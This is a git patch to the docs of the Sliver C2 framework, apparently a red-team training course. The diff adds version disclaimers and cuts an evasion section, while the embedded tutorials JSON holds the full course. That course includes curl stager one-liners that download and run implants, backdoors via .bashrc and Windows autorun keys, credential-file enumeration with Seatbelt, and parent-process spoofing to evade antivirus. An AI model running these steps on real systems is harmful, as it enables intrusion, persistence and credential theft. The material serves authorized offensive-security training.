Do not change this entry.\\n##\\n127.0.0.1...\n```\n\nAs an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.\n\nHere are a couple hints:\n\n- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc\n- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload(\"/home/target/.bashrc\", contents + b'\\r\\necho \"pwned !\"')`.\n- For Windows you can look at the `registry_read` and `registry_create_key` functions.\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)\n- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)\n- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)\n- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)\n"},{"name":"7 - Assemblies and Bofs","content":"The Sliver armory is used to install and maintain third party extensions and aliases within sliver. The full list of available extensions can be found at https://github.com/sliverarmory/armory, keep in mind this is community maintained so not all modules are necessarily up to date. \n\nPull requests are always welcome ! \n\nYou can download all configured extensions/aliases using the armory command.\n\n```bash\n[server] sliver > armory install all\n\n? Install 18 aliases and 84 extensions? Yes\n[*] Installing alias 'SharpSecDump' (v0.0.1) ... done!\n[*] Installing alias 'SharpChrome' (v0.0.1) ... done!\n[*] Installing alias 'SharpDPAPI' (v0.0.1) ... done!\n[*] Installing alias 'SharpMapExec' (v0.0.1) ... done!\n[*] Installing alias 'KrbRelayUp' (v0.0.1) ... done!\n[*] Installing alias 'SharpRDP' (v0.0.1) ... done!\n[*] Installing alias 'SharpUp' (v0.0.1) ... done!\n[*] Installing alias 'SharpView' (v0.0.1) ... done!\n[*] Installing alias 'SharPersist' (v0.0.1) ... done!\n[*] Installing alias 'Sharp WMI' (v0.0.2) ... done!\n...\n[*] All packages installed\n```\n\nThese commands can then be used in the context of a session or beacon similarly to other commands, with a couple caveats.\n\nLet’s go ahead and run our first assembly.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > seatbelt \" WindowsCredentialFiles\"\n\n[*] seatbelt output:\n\n %&&@@@&&\n &&&&&&&%%%, #&&@@@@@@%%%%%%###############%\n &%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%\n%%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################(((((((((((((((((((\n#%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################(((((((((((((((((((\n#%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#((((((((((\n#####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####((((((((\n#######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((#####\n###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((#####\n#####%###################### %%%.. @////(((&%%%%%%%################\n &%& %%%%% Seatbelt %////(((&%%%%%%%%#############*\n &%%&&&%%%%% v1.1.1 ,(((&%%%%%%%%%%%%%%%%%,\n #%%%%##,\n\n====== WindowsCredentialFiles ======\n\n Folder : C:\\Users\\defaultuser0\\AppData\\Local\\Microsoft\\Credentials\\\n\n ...\n```\n\nAs you can see Sliver ran the Seatbelt assembly and provided us with the output of our command. Let’s investigate how exactly that happened.\n\nThe first thing we can notice is a new process spinning up when we run our command.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ae07f231-691e-4933-883f-fa368d0f78e6/Untitled.png)\n\nTaking a closer look, that process is a child of our implant `UNABLE_PRIDE.exe`.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/2dfe565c-6429-4b74-a916-5a920f0ca85e/Untitled.png)\n\nIf you look at the assemblies loaded in that process, you’ll notice that the .NET clr along with the Seatbelt code are loaded into memory.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a92e524b-dda2-4b41-8254-3fc47e2ed025/Untitled.png)\n\nAll of this information indicates this process was used to run a post-exploitation module and will by default get caught by most AV’s. \n\nA more stealthy approach would be to change the default process to something more realistic and use parent process spoofing in order to mask our activity such as in the example below.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > seatbelt -P 2968 -p \"C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\" \" WindowsCredentialFiles\"\n```\n\nIn this case we spoof our parent process id to `2968`, a Chrome process that has other similar child processes and set the default program to be `chrome.exe`.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/93ee0728-be82-4fbb-8084-47f2bd336ece/Untitled.png)\n\nThis already looks a lot better and is more likely to bypass detections. A further improvement could be to identify processes that already load the .net CLR and use those to host our post-exploitation payloads or doing additional obfuscation of our extensions to avoid static detections such as `Seatbelt`,However this is somewhat beyond the scope of this course.\n\nAnother way to avoid detection is by running the assembly in process using the `-i` flag, while that avoids spinning up a new process, if the extension crashes for whatever reason you will loose your implant.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > seatbelt -i \" WindowsCredentialFiles\"\n...\n```\n\nIf we take a look at the process hosting seatbelt, we’ll see its our implant process which will contain the .NET assembly references.\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/37729326-f18b-4250-a873-d4bf4e54b7d5/Untitled.png)\n\n![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e1c05c2f-f2b7-4784-a23b-a837f456cb45/Untitled.png)\n\n## Bof’s\n\nBeacon object files are loaded using trustedsec’s coffloader, when you run a bof command the loader will first be loaded into memory and is used to run whichever bof you choose. From an operator’s perspective bof’s are similar to basic sliver commands.\n\n```bash\n[server] sliver (UNABLE_PRIDE) > sa-whoami\n\n[*] Successfully executed sa-whoami (coff-loader)\n[*] Got output:\n\nUserName\t\tSID\n====================== ====================================\ntest.local\\tester\n\nGROUP INFORMATION Type SID Attributes\n================================================= ===================== ============================================= ==================================================\ntest.local\\None Group S-1-5-21-3109228153-3872411817-1195593578-513 Mandatory group, Enabled by default, Enabled group,\nEveryone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\Local account and member of Administrators groupWell-known group S-1-5-114\nBUILTIN\\Administrators Alias S-1-5-32-544\nBUILTIN\\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group,\nBUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group,\nCONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group,\nLOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group,\nNT AUTHORITY\\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group,\nMandatory Label\\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group,\n\nPrivilege Name Description State\n============================= ================================================= ===========================\nSeShutdownPrivilege Shut down the system Disabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeUndockPrivilege Remove computer from docking station Disabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled\nSeTimeZonePrivilege Change the time zone Disabled\n```\n\nSince these payloads are run in-process, they have similar advantages and drawbacks as in-process assemblies meaning no new processes are spawned on execution, but a crash risks loosing the implant.\n\nAs an exercise, take some time to try out some of the available commands like `sa-ipconfig`, `nanodump` or `sa-ldapsearch`.\n\n## References\n\nhttps://github.com/sliverarmory/armory\n\n[https://github.com/BishopFox/sliver/wiki/BOF-&-COFF-Support](https://github.com/BishopFox/sliver/wiki/BOF-&-COFF-Support)\n\n[https://github.com/BishopFox/sliver/wiki/Aliases-&-Extensions](https://github.com/BishopFox/sliver/wiki/Aliases-&-Extensions)\n\n[https://github.com/sliverarmory/COFFLoader](https://github.com/sliverarmory/COFFLoader)\n\n"}]} \ No newline at end of file From b8cef5fbd65a8e1fb97fa2f9cc535a6ecfb4446b Mon Sep 17 00:00:00 2001 From: Tim Makram Ghatas <47985652+TimBF@users.noreply.github.com> Date: Mon, 22 Jul 2024 21:26:49 +0200 Subject: [PATCH 7/7] removed broken links from chapter 7 and added disclaimer to all pages --- .../tutorials/md/2 - Beacons vs Sessions.md | 2 + .../md/3 - C2 Profiles and configuration.md | 2 + .../tutorials/md/4 - HTTP Payload staging.md | 2 + .../pages/tutorials/md/5 - Pivots.md | 2 + .../pages/tutorials/md/6 - Scripting.md | 2 + .../tutorials/md/7 - Assemblies and Bofs.md | 43 ++----------------- docs/sliver-docs/public/tutorials.json | 2 +- 7 files changed, 14 insertions(+), 41 deletions(-) diff --git a/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md b/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md index 4ee90e4423..2466836b01 100644 --- a/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md +++ b/docs/sliver-docs/pages/tutorials/md/2 - Beacons vs Sessions.md @@ -1,3 +1,5 @@ +# This course is intented for the 1.6 version of Sliver, which is not yet published + Sliver implants support two types of connections, sessions and beacons. Sessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden. diff --git a/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md b/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md index 4f493db812..4638cd10f5 100644 --- a/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md +++ b/docs/sliver-docs/pages/tutorials/md/3 - C2 Profiles and configuration.md @@ -1,3 +1,5 @@ +# This course is intented for the 1.6 version of Sliver, which is not yet published + When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective. C2 profile configurations can be seen using the `c2profile` command, which also allows import and export features. diff --git a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md index 8540db9e7c..27ceb9dc64 100644 --- a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md +++ b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md @@ -1,3 +1,5 @@ +# This course is intented for the 1.6 version of Sliver, which is not yet published + When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command. For this exercise we will create a new beacon profile and prepare to stage it. diff --git a/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md b/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md index 108edb586a..18d7f15006 100644 --- a/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md +++ b/docs/sliver-docs/pages/tutorials/md/5 - Pivots.md @@ -1,3 +1,5 @@ +# This course is intented for the 1.6 version of Sliver, which is not yet published + Pivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to. Sliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only. diff --git a/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md b/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md index 85ce695349..7442ed9f6c 100644 --- a/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md +++ b/docs/sliver-docs/pages/tutorials/md/6 - Scripting.md @@ -1,3 +1,5 @@ +# This course is intented for the 1.6 version of Sliver, which is not yet published + Reactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events. ```bash diff --git a/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md b/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md index 8d695f95b9..6c410a06aa 100644 --- a/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md +++ b/docs/sliver-docs/pages/tutorials/md/7 - Assemblies and Bofs.md @@ -1,3 +1,5 @@ +# This course is intented for the 1.6 version of Sliver, which is not yet published + The Sliver armory is used to install and maintain third party extensions and aliases within sliver. The full list of available extensions can be found at https://github.com/sliverarmory/armory, keep in mind this is community maintained so not all modules are necessarily up to date. You can download all configured extensions/aliases using the armory command. @@ -49,46 +51,7 @@ Let’s go ahead and run our first assembly. ... ``` -As you can see Sliver ran the Seatbelt assembly and provided us with the output of our command. Let’s investigate how exactly that happened. - -The first thing we can notice is a new process spinning up when we run our command. - -![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/ae07f231-691e-4933-883f-fa368d0f78e6/Untitled.png) - -Taking a closer look, that process is a child of our implant `UNABLE_PRIDE.exe`. - -![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/2dfe565c-6429-4b74-a916-5a920f0ca85e/Untitled.png) - -If you look at the assemblies loaded in that process, you’ll notice that the .NET clr along with the Seatbelt code are loaded into memory. - -![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a92e524b-dda2-4b41-8254-3fc47e2ed025/Untitled.png) - -All of this information indicates this process was used to run a post-exploitation module and will by default get caught by most AV’s. - -A more stealthy approach would be to change the default process to something more realistic and use parent process spoofing in order to mask our activity such as in the example below. - -```bash -[server] sliver (UNABLE_PRIDE) > seatbelt -P 2968 -p "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" " WindowsCredentialFiles" -``` - -In this case we spoof our parent process id to `2968`, a Chrome process that has other similar child processes and set the default program to be `chrome.exe`. - -![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/93ee0728-be82-4fbb-8084-47f2bd336ece/Untitled.png) - -This already looks a lot better and is more likely to bypass detections. A further improvement could be to identify processes that already load the .net CLR and use those to host our post-exploitation payloads or doing additional obfuscation of our extensions to avoid static detections such as `Seatbelt`,However this is somewhat beyond the scope of this course. - -Another way to avoid detection is by running the assembly in process using the `-i` flag, while that avoids spinning up a new process, if the extension crashes for whatever reason you will loose your implant. - -```bash -[server] sliver (UNABLE_PRIDE) > seatbelt -i " WindowsCredentialFiles" -... -``` - -If we take a look at the process hosting seatbelt, we’ll see its our implant process which will contain the .NET assembly references. - -![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/37729326-f18b-4250-a873-d4bf4e54b7d5/Untitled.png) - -![Untitled](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e1c05c2f-f2b7-4784-a23b-a837f456cb45/Untitled.png) +As you can see Sliver ran the Seatbelt assembly and provided us with the output of our command. ## Bof’s diff --git a/docs/sliver-docs/public/tutorials.json b/docs/sliver-docs/public/tutorials.json index aababd6135..7c2fdbcee9 100644 --- a/docs/sliver-docs/public/tutorials.json +++ b/docs/sliver-docs/public/tutorials.json @@ -1 +1 @@ -{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"Sliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nWe will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`.\n\nWe will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way.\n\nWe will split the urls using a script like the example below, and then update the files and paths variables in our configuration file.\n\n```python\nimport json\nimport math\nimport sys\nimport random\n\n\ndef updateProfile(c2ProfileName, urls, cookieName):\n data = open(urls).readlines()\n c2Profile = open(c2ProfileName, \"r\").read()\n jsonC2Profile = json.loads(c2Profile)\n\n paths, filenames, extensions = [], [], []\n for line in data:\n line = line.strip()\n if \".\" in line:\n extensions.append(line.split(\".\")[-1])\n\n if \"/\" in line:\n segments = line.split(\"/\")\n paths.extend(segments[:-1])\n filenames.append(segments[-1].split(\".\")[0])\n\n extensions = list(set(extensions))\n if \"\" in extensions:\n extensions.remove(\"\")\n random.shuffle(extensions)\n\n filenames = list(set(filenames))\n if \"\" in filenames:\n filenames.remove(\"\")\n\n paths = list(set(paths))\n if \"\" in paths:\n paths.remove(\"\")\n\n if len(extensions) < 5:\n print(f'Got {len(extensions)} extensions, need at least 5.')\n exit(0)\n\n if len(paths) < 5:\n print(f'Got {len(paths)} paths need at least 5.')\n exit(0)\n\n if len(filenames) < 5:\n print(f'Got {len(filenames)} paths need at least 5.')\n exit(0)\n\n exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ]\n for ext in exts:\n jsonC2Profile[\"implant_config\"][ext] = extensions[0]\n extensions.pop(0)\n\n pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ]\n for x, pathType in enumerate(pathTypes):\n jsonC2Profile[\"implant_config\"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))]\n\n fileTypes = ['poll_files','stager_files', 'session_files', 'close_files']\n for x, fileType in enumerate(fileTypes):\n jsonC2Profile[\"implant_config\"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))]\n\n jsonC2Profile[\"server_config\"][\"cookies\"] = [cookieName]\n c2Profile = open(c2ProfileName, \"w\")\n c2Profile.write(json.dumps(jsonC2Profile))\n print(\"C2 Profile updated !\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage: updateProfile.py myC2Profile myurls.txt cookieName\")\n exit(0)\n\n updateProfile(sys.argv[1], sys.argv[2], sys.argv[3])\n```\nThe example below demonstrates how to change and import a profile.\n\n```asciinema\n{\"src\": \"/asciinema/custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can generate a new implant using our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf we review the debug logs of our implant we can see that the connections now use our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_debug_logs.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \n\n"},{"name":"4 - HTTP Payload staging","content":"When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.\n\nFor this exercise we will create a new beacon profile and prepare to stage it.\n\n```asciinema\n{\"src\": \"/asciinema/create_profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf you look at the generated implant, you'll notice the `ID` field has been populated. When downloading your payload from the staging server your URL needs to be in the form of:\n```\nhttps://sliver-ip/whatever.stager_file_ext?x=yourID\n```\n\nThere is a lot of flexibility in the form of this URL, the conditions for successfull staging are:\n* The file extension needs to match the c2 profile's stager_file_ext\n* There has to be a one character http url parameter\n* The digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values\n\nTo expose a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed.\n\n```asciinema\n{\"src\": \"/asciinema/stage_implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can try retrieving our implant, the ID is 19778.\n\n```asciinema\n{\"src\": \"/asciinema/implant_curl.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nSliver staging also supports encoding or encrypting our payloads before exposing them extenrally using the `profile stage` command, the implant configuration remains the same but you are now able to stage different versions of it simultaneously.\n\n```asciinema\n{\"src\": \"/asciinema/stage_compress_encrypt.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nA simple stager could look like this for example in Linux:\n\n```\ncurl http://localhost/nothingtoseehere.yml?c=1234 --output nothingtoseehere && chmod u+x nothingtoseehere &&nohup ./nothingtoseehere\n```\n\nOr on Windows:\n```\ncurl http://172.20.10.3/test.woff?a=29178 -o t.exe && .\\t.exe\n```\n"},{"name":"5 - Pivots","content":"# Pivots\n\nPivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.\n\nSliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.\n\nIn both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > pivots tcp\n\n[*] Started tcp pivot listener :9898 with id 1\n\n[server] sliver (INNER_GO-KART) > pivots\n\n ID Protocol Bind Address Number Of Pivots\n==== ========== ============== ==================\n 1 TCP :9898 0\n```\n\nThe listening port and interface can be configured during creation.\n\nThe next step is to generate a payload that will connect to our listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos\n\n[*] Generating new darwin/amd64 implant binary\n[*] Symbol obfuscation is enabled\n[*] Build completed in 12s\n[*] Implant saved to /Users/tester/tools/VALUABLE_SICK\n```\n\nExecuting this payload will cause it to connect back through our original implant and then back to our C2 server.\n"},{"name":"6 - Scripting","content":"## Sliver Reactions\n\nReactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.\n\n```bash\nReactable Events:\n session-connected Triggered when a new session is opened to a target\n session-updated Triggered on changes to session metadata\nsession-disconnected Triggered when a session is closed (for any reason)\n canary Triggered when a canary is burned or created\n watchtower Triggered when implants are discovered on threat intel platforms\n loot-added Triggered when a new piece of loot is added to the server\n loot-removed Triggered when a piece of loot is removed from the server\n```\n\nLet’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in.\n\n```bash\nreaction set -e \"session-connected\"\n\n[*] Setting reaction to: Session Opened\n\n? Enter commands: [Enter 2 empty lines to finish]pwd\nenv\n? Enter commands:\npwd\nenv\n\n[*] Set reaction to session-connected (id: 1)\n```\n\nThe reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection.\n\n```bash\n[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST\n\n[*] Execute reaction: 'pwd'\n\n[*] /Users/tester\n\n[*] Execute reaction: 'env'\n\nPWD=/Users/tester\nCOLORTERM=truecolor\n...\n```\n\nYou can remove reactions using `reaction unset`.\n\nHowever, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. \n\nSecondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in 